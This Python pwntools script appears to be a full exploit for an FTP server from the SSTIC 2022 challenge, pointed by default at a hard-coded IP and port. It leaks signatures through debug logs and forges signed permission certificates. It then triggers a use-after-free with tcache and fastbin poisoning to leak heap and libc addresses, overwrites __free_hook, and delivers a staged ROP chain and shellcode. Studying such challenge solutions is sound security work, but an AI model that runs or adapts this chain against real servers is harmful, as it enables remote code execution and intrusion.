import logging
import argparse
import coloredlogs
import time
from pwn import *
import hexdump
import tqdm

from HSM import HSM
from FTP import FTP
from ROPUtils import ROPUtils

logger = logging.getLogger('exploit')
logger.setLevel(logging.DEBUG)
coloredlogs.install(level='DEBUG', logger=logger,fmt='%(name)s:%(levelname)s:%(message)s')

def u64z(data):
	return u64(data + b"\x00" * (8 - len(data)))

def exploit(ip,port):
	#####################################################
	#                 leak signature                    #
	#####################################################
	ftp = FTP(ip,port)
	ftp.cmd_user(b"anonymous")
	ftp.cmd_pass()
	# enable debug mode
	ftp.cmd_dbg()
	ftp.cmd_user(b"A"*15+b"=")
	ftp.cmd_user(b"anon")
	ftp.cmd_pass()
	ftp.cmd_user(b"A"*15+b"=")
	ftp.cmd_user(b"anon")
	ftp.cmd_pass()
	
	p1,p2 = ftp.cmd_getpasv()

	log = ftp.cmd_retr(b"ftp.log")
	first_leak = log.index(b"User "+b"A"*15+b"=") + 21
	second_leak = log.rindex(b"User "+b"A"*15+b"=") + 21

	sig1 = u64(log[first_leak:first_leak + 8])
	sig2 = u64(log[second_leak:second_leak + 8])
	
	logger.info("signature 1 : %016.16x" % sig1)
	logger.info("signature 2 : %016.16x" % sig2)
	
	hsm = HSM()
	c1 = 0x6f6d796e6f6e6101
	c2 = 0x6e6f6e6101
	
	keys = hsm.find_keys(c1,c2,sig1,sig2)
	
	# try every solutions
	for couple_key in keys:
		hsm.set_keys(couple_key[0],couple_key[1])
		signature = hsm.sign_data(b"user=x&perms=2")
		certificate = b"user=x&perms=2&sig=%d" % signature
		
		if ftp.cmd_cert(certificate):
			logger.info("KEY FOUND")
			break
	
	#########################################
	#              leak heap                #  
	#########################################
	
	# free chunk A
	ftp.cmd_cert(b"user=x&perms=2&sig=%d" % 0)
	# send username in ftp.log
	ftp.p.sendline(b"FEAT\n")
	logger.debug(ftp.p.recvline().decode('ascii'))
 
	low_pasv_port = 130
	# realloc chunkA
	signature = hsm.sign_data(b"user="+ bytes([low_pasv_port]) +b"&perms=2")
	certificate = b"user="+ bytes([low_pasv_port]) +b"&perms=2&sig=%d" % signature
	ftp.cmd_cert(certificate)

	log = ftp.cmd_retr(b"ftp.log")
	
	heap_leak = 0
	if log is not None:	
		for line in log.split(b"\n"):
			if b"FEAT" in line:
				leak = line.split(b":")[0]
				leak = leak.replace(b"User ",b"").replace(b" ",b"")
				heap_leak = u64z(leak)
				break
	
	heap_cert = heap_leak + 0x2350 + 0x10
	heap_libc_leak = heap_leak + 0x21d0
	heap_server = heap_leak + 0x20

	logger.info("heap : %x" % heap_leak)
	logger.info("cert : %x" % heap_cert)
	logger.info("server : %x" % heap_server)
	
	#########################################
	#              leak libc                #  
	#########################################
	
	# corrupt tcache linked list
	payload = p64(heap_cert)[0:7]
	signature = hsm.sign_data(b"user="+payload+b"&perms=2")
	ftp.cmd_cert(b"user="+payload.replace(b"\0",b"\n")+b"&perms=2&sig=%d" % signature)

	# poisoning tcache
	conn = ftp.cmd_pasv()
	ftp.cmd_user(b"anonymous")
	ftp.cmd_pass()
	
	# poisoning tcache
	payload = b"xxxxxxxx"+p64(7)[0:7] # keep member sock of passiv_conn_t
	signature = hsm.sign_data(b"user="+payload+b"&perms=2")
	ftp.cmd_cert(b"user="+payload.replace(b"\0",b"\n")+b"&perms=2&sig=%d&user=xxxxxxx" % signature)
	# username chunk override certificate chunk
	# make username points to chunk with libc address
	payload = p64(heap_libc_leak)[0:8]
	signature = hsm.sign_data(b"user="+payload+b"&perms=2")
	ftp.cmd_cert(b"user="+payload.replace(b"\0",b"\n")+b"&perms=2&sig=%d" % signature)
	# leak libc address in log
	ftp.cmd_feat()
	ftp.p.sendline(b"RETR ftp.log")
	logger.debug(ftp.p.recvline().decode('ascii'))
	log = conn.recvall()
	logger.debug(ftp.p.recvline().decode('ascii'))
	lines = log.split(b"\n")
	leak = lines[len(lines) - 1].split(b":")[0]
	leak = leak.replace(b"User ",b"").replace(b" ",b"").replace(b"\n",b"")

	libc_leak = u64z(leak[0:8])
	libc_base = libc_leak - 0x1ecc40
	libc_free_hook = libc_base + 0x1eee48
	logger.info("libc_leak = %x" % libc_leak)
	logger.info("libc_base = %x" % libc_base)
	logger.info("libc_free_hook = %x" % libc_free_hook)
	
	roputils = ROPUtils(libc_base)
	
	#########################################
	#              corrupt free hook        #  
	#########################################
	ftp.cmd_user(b"anonymous")
	ftp.cmd_pass()

	signature = hsm.sign_data(b"user=x&perms=2")
	ftp.cmd_cert(b"user=x&perms=2&sig=%d" % signature)
	# trig UAF
	ftp.cmd_cert(b"user=x&perms=2&sig=%d" % 0)

	# corrupt fastbin
	signature = hsm.sign_data(b"user="+p64(libc_free_hook)+b"&perms=2")
	ftp.cmd_cert(b"user="+p64(libc_free_hook).replace(b"\0",b"\n")+b"&perms=2&sig=%d" % signature)

	# poisoning fastbin
	conn = ftp.cmd_pasv()
	ftp.cmd_user(b"anonymous")
	ftp.cmd_pass()

	loader = roputils.build_loader()               # loader to load a shellcode
	shellcode = roputils.build_shellcode()  
	
	stage2 = roputils.stage2_load_stage3(loader)   # ROP to load a loader
	ropchain = roputils.stage1_load_stage2(stage2) # ROP to load a ROP
	
	# alloc / alloc
	signature = hsm.sign_data(b"user=x&perms=2&x"+ropchain)
	ftp.cmd_cert( (b"user=x&perms=2&x"+ropchain.replace(b"\0",b"\n")+b"&sig=%d" % signature) + b"&user=" +p64(roputils.pivot),exploit=True)
	
	###############################
	# send stage2                 #
	###############################
	time.sleep(1)
	ftp.p.send(stage2)

	time.sleep(1)
	ftp.p.send(p32(len(shellcode)))

	logger.info("sending shellcode ...")
	for i in tqdm.tqdm(range(0,len(shellcode),128)):
		ftp.p.send(shellcode[i:i+128])
		time.sleep(0.1)
	
	data = ftp.p.recvall()

	with open("final.txt","wb") as f:
		logger.info("received %d bytes from exploit, store it into final.txt" % len(data))
		# skip page leak
		f.write(data[0x00001000:])
		
	ftp.p.close()

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="Challenge SSTIC 2022")
	parser.add_argument("--ip",type=str,default="62.210.131.87")
	parser.add_argument("--port",type=int,default=31337)
	args = parser.parse_args()
	exploit(args.ip,args.port)
